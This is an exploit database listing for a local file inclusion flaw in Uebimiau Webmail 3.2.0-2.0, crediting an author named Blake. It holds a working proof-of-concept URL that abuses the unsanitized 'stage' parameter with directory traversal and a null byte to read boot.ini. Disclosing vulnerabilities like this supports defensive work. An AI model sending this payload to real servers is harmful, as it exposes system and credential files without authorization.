[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Uebimiau Webmail 3.2.0-2.0 Local File Inclusion Vulnerability

Author
Blake
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-14365
Category
web applications
Date add
05-10-2010
Platform
php
=============================================================
Uebimiau Webmail 3.2.0-2.0 Local File Inclusion Vulnerability
=============================================================

# Exploit Title: Uebimiau Webmail Local File Inclusion
# Date: 10-04-10
# Author: Blake
# Software Link: http://sourceforge.net/projects/t-dahmail/files/latest/Uebimiau_3.2.0_2.0_Alpha.zip/download
# Version: 3.2.0-2.0
# Tested on: Windows XP SP3 running xampp lite
 
The stage parameter is not properly sanitized.
 
POC:
http://127.0.0.1/webmail/admin/install/index.php?stage=../../../../../../../../../boot.ini%00&lid=



#  0day.today [2024-11-15]  #